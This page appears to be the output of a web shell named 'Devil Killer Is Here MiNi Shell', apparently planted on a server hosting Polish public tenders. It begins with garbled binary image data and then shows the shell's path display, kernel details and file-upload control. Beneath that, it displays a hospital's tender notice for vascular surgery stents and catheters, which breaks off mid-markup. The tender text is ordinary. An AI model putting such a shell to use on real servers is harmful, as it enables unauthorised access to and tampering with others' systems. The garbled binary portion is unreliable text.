JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230927/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230927/0041503501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> 75.23 Sprzedaż i dostawa asortymentu niezbędnego dla potrzeb Chirurgii Naczyniowej Szpitala Specjalistycznego im. Edmunda Biernackiego w Mielcu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szpital Specjalistyczny im. Edmunda Biernackiego w Mielcu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000308637</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żeromskiego 22</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mielec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">39-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL824 - Tarnobrzeski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@szpital.mielec.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szpital.mielec.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> 75.23 Sprzedaż i dostawa asortymentu niezbędnego dla potrzeb Chirurgii Naczyniowej Szpitala Specjalistycznego im. Edmunda Biernackiego w Mielcu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ae78b9a6-5b76-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00415035</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-09-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00197711/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.16 SPRZEDAŻ I DOSTAWA ASORTYMENTU NIEZBĘDNEGO DLA POTRZEB CHIRURGII NACZYNIOWEJ</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-ae78b9a6-5b76-11ee-a60c-9ec5599dddc1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie PZP, odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002r. o świadczeniu usług drogą elektroniczną.<br/>2.	Komunikacja ustna dopuszczalna jest w odniesieniu do informacji, które nie są istotne, w szczególności nie dotyczą ogłoszenia o zamówieniu lub dokumentów zamówienia, ofert, o ile jej treść jest udokumentowana.<br/>3.	Ofertę, oświadczenia, o których mowa w art. 125 ust.1 ustawy PZP, podmiotowe środki dowodowe, zobowiązanie podmiotu udostępniającego zasoby, przedmiotowe środki dowodowe, pełnomocnictwa sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .pdf, .doc, .docx, .odt, .txt, .rtf<br/>4.	Ofertę oraz oświadczenia i dokumenty, o których mowa w pkt. 3 składa się pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>5.	Zawiadomienia, oświadczenia, dokumenty, wnioski lub informacje (nie dotyczy składania ofert) Wykonawcy przekazują:<br/>a)	za pośrednictwem formularzy do komunikacji dostępnych na Platformie e-Zamówienia w zakładce „Formularze” („Formularze do komunikacji”).<br/>lub<br/>b)	drogą elektroniczną na adres przetargi@szpital.mielec.pl.<br/>6.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawcy” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum pomocy”.<br/>7.	Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>8.	Komunikacja w postępowaniu, z wyłączeniem składania ofert odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesłanej wiadomości (przycisk „dodaj załącznik”). <br/>9.	Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowaniu się na platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści SWZ wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>10.	Wszystkie wysyłane i odebrane w postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>11.	Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>12.	Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>13.	We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem postępowania: SzP.ZP.271.75.23</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. U. UE L 119 z dnia 04.05.2016, str. 1), zwanym dalej „RODO”, Zamawiający informuje, iż: <br/>1.	Administratorem Pani/Pana danych osobowych jest Szpital Specjalistyczny im. Edmunda Biernackiego z siedzibą przy ul. Żeromskiego 22, 39-300 Mielec. Dane kontaktowe:<br/>-poczta elektroniczna: sekretariat@szpital.mielec.pl<br/>-telefon: 17 780-01-39<br/>2.	Administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail iod@szpital.mielec.pl <br/>3.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na sprzedaż i dostawę asortymentu niezbędnego dla potrzeb Chirurgii Naczyniowej Szpitala Specjalistycznego im. Edmunda Biernackiego w Mielcu, znak SzP.ZP.271.75.23 prowadzonym w trybie podstawowym bez negocjacji;<br/>4.	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych, dalej „ustawa PZP”; <br/>5.	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6.	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy PZP; <br/>7.	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8.	posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego; <br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9.	nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>10.	przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez Administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SzP.ZP.271.75.23</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp.	Wykaz asortymentu J.m.	Ilość<br/>1	Stent samorozprężalny szyjny: <br/>-stent dostosowany do naczyń szyjnych <br/>-wykonany ze stopu stali z kobaltem <br/>-system dostawczy akceptujący prowadnik 0,014”, monorail <br/>-długość cewnika dostawczego 135 cm <br/>-średnica systemu dostawczego 5 oraz 5,9F <br/>-stent pleciony w kształt tabularnej siatki (mesh), o geometrii zamkniętych cel <br/>-stent o dużej elastyczności, miękkości i możliwości dopasowania do kształtu naczynia i jego zmieniającej się średnicy – tętnica szyjna wspólna – tętnica szyjna wewnętrzna <br/>-stent z możliwością ponownego złożenia – całkowicie repozycjonowalny <br/>-średnice: 4-10 mm <br/>-długości: 30/40/50 mm <br/>- dobra widoczność stentu we fluoroskopie, bez markerów	<br/>szt.	10<br/>2	Prowadnik z filtrem do neuroprotekcji: <br/>-prowadnik 0,014&#34; o długości 190 cm oraz 300 cm z platynową miękką kształtowalną końcówką <br/>-prowadnik umieszczony w sposób niecentryczny wobec koszyka filtra <br/>-koszyk filtra umocowany w sposób ruchomy - gwarantujący obrót na prowadniku <br/>-filtr w postaci pętli nitinolowej samorozprężalnej z koszykiem/membraną o porowatości 110 mikronów <br/>-jeden rozmiar dopasowujący się do różnych średnic naczynia w zakresie od 3,5 do 5,5 mm <br/>-koszulka dostawcza w systemie Monorail o profilu przejścia 3,2F	<br/>szt.	30<br/>3	Cewniki balonowe do tetnicy szyjnej. Cewniki w systemie RX (Monorail) o długościach 80, 90, 135, 150 cm, kompatybilne z prowadnikiem 0,018 &#34;, średnice od 2mm do 7mm (co 0,5mm) i 8mm. Długosci: 10/15/20/30/40/60/80/100/120/150/220 mm, kompatybilne z koszulka 4F i 5F dla średnic 7mm i 8mm, ciśnienie RBP 14 atm i 12ATM dla 8mm średnicy	<br/>szt	30<br/>4	Cewnik balonowy tnący:<br/>-cewnik kompatybilny z prowadnikiem 0,014&#34; (rapid exchange) i 0,018&#34; (OTW)<br/>-średnice balonu od 2 mm do 8 mm<br/>-długości balonu: 1,5 cm i 2 cm<br/>-liczba aterotomów: 3 lub 4<br/>-długość cewnika: od 50 cm do 140 cm<br/>-kompatybilny z koszulką 6 lub 7 F w zależności od średnicy<br/>- RBP 10 i 12 atm-ciśnienie nominalne 8 ATM<br/>-średnie ciśnienie rozrywające 12 ATM	<br/>szt.	10<br/>5	Prowadnik pokrywany hydrofilnie w części dystalnej powłoką ICE. Średnica 0,018”, długości 110/150/200/300cm. Kształtowalny koniec o długości 2cm. Dystalna część miękka na długości 8 oraz 12cm. Sztywności końcówek 6g i 8g. Rdzeń ze stali nierdzewnej 304V	<br/>szt.	10<br/>6	Cewnik prowadzący zbrojony podwójnym splotem wolframowym i ze stali nierdzewnej. Cewnik o średnicach 6/7/8F i dużym świetle wewnętrznym: 6F - 0,070”, 7F - 0,081”, 8F - 0,091”Długości: 55 i 90cm. Wewnętrzne powłoka wykonana z PTFE a zewnętrzna z Arnitel-u. Miękka, atraumatyczna końcówka w 17 wariantach kształtów	<br/>szt.	10 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33111730-7 - Wyroby do angioplastyki</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33141200-2 - Cewniki</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zamawiający przewiduje możliwość zastosowania prawa opcji w przypadku niewyczerpania wartości umowy, o której mowa w § 6 ust. 1, w „okresie podstawowym” określonym w § 11 umowy.<br/>2.	Decyzję co do możliwości skorzystania z prawa opcji Zamawiający uzależnia od swoich bieżących potrzeb oraz wykorzystania wartości umowy określonej w § 6 ust. 1 umowy.<br/>3.	Zastosowanie przez Zamawiającego prawa opcji będzie polegać na powtórzeniu tych samych dostaw jak te, które są świadczone przez Wykonawcę, z którym została zawarta niniejsza umowa w sprawie zamówienia publicznego.<br/>4.	Wszystkie wymagania zawarte w umowie i SWZ dotyczą także realizacji zamówienia w ramach prawa opcji. W przypadku zastosowania prawa opcji żadna cena wskazana w Formularzu Cenowym Wykonawcy, nie ulegnie zmianie za wyjątkiem przypadków i na zasadach opisanych w umowie. <br/>5.	Przy zastosowaniu prawa opcji Wykonawca będzie świadczył dostawy w okresie nie dłuższym niż 6 miesięcy, następujących po dniu, wskazanym w umowie jako dzień zakończenia świadczenia dostawy w „okresie podstawowym”.<br/>6.	Zamawiający może wykonać prawo opcji wielokrotnie i w dowolnym dniu przed upływem „okresu podstawowego” lub w okresie obowiązywania umowy wskutek skorzystania z opcji. Zamawiający złoży Wykonawcy oświadczenie o zastosowaniu prawa opcji. Niezłożenie oświadczenia we wskazanym w zdaniu poprzednim terminie będzie oznaczało, że Zamawiający rezygnuje z zastosowania prawa opcji.<br/>7.	W przypadku zastosowania przez Zamawiającego prawa opcji oświadczenie, o którym mowa w ust. 6 będzie stanowiło integralną część Umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-02</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami oceny ofert:<br/>najniższa cena	– 100 %<br/>Sposób oceny ofert:<br/>kryterium „najniższa cena” (Wpc) jako kryterium wymierne obliczane zostanie wg wzoru: <br/>Wpc=Cn/Cof x Rc<br/>gdzie:<br/>Wpc – Wartość punktowa badanej oferty w kryterium „najniższa cena”<br/>Cn – najniższa oferowana cena brutto spośród ofert, które złożyły oferty<br/>Cof– cena brutto oferty badanej<br/>Rc – ranga kryterium „najniższa cena” (100)<br/>W kryterium „najniższa cena” Wykonawca może otrzymać maksymalnie 100 punktów.<br/>Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp.	Wykaz asortymentu J.m.	Ilość<br/>1	Przedłużacze wysokociśnieniowe giętkie, wykonane z poliuretanu, zbrojone wytrzymujące ciśnienie do 1200 psi, końcówki typu Luer, odporne na zginanie, długości od 25 do 200 cm	<br/>szt	60 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33111730-7 - Wyroby do angioplastyki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zamawiający przewiduje możliwość zastosowania prawa opcji w przypadku niewyczerpania wartości umowy, o której mowa w § 6 ust. 1, w „okresie podstawowym” określonym w § 11 umowy.<br/>2.	Decyzję co do możliwości skorzystania z prawa opcji Zamawiający uzależnia od swoich bieżących potrzeb oraz wykorzystania wartości umowy określonej w § 6 ust. 1 umowy.<br/>3.	Zastosowanie przez Zamawiającego prawa opcji będzie polegać na powtórzeniu tych samych dostaw jak te, które są świadczone przez Wykonawcę, z którym została zawarta niniejsza umowa w sprawie zamówienia publicznego.<br/>4.	Wszystkie wymagania zawarte w umowie i SWZ dotyczą także realizacji zamówienia w ramach prawa opcji. W przypadku zastosowania prawa opcji żadna cena wskazana w Formularzu Cenowym Wykonawcy, nie ulegnie zmianie za wyjątkiem przypadków i na zasadach opisanych w umowie. <br/>5.	Przy zastosowaniu prawa opcji Wykonawca będzie świadczył dostawy w okresie nie dłuższym niż 6 miesięcy, następujących po dniu, wskazanym w umowie jako dzień zakończenia świadczenia dostawy w „okresie podstawowym”.<br/>6.	Zamawiający może wykonać prawo opcji wielokrotnie i w dowolnym dniu przed upływem „okresu podstawowego” lub w okresie obowiązywania umowy wskutek skorzystania z opcji. Zamawiający złoży Wykonawcy oświadczenie o zastosowaniu prawa opcji. Niezłożenie oświadczenia we wskazanym w zdaniu poprzednim terminie będzie oznaczało, że Zamawiający rezygnuje z zastosowania prawa opcji.<br/>7.	W przypadku zastosowania przez Zamawiającego prawa opcji oświadczenie, o którym mowa w ust. 6 będzie stanowiło integralną część Umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-02</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 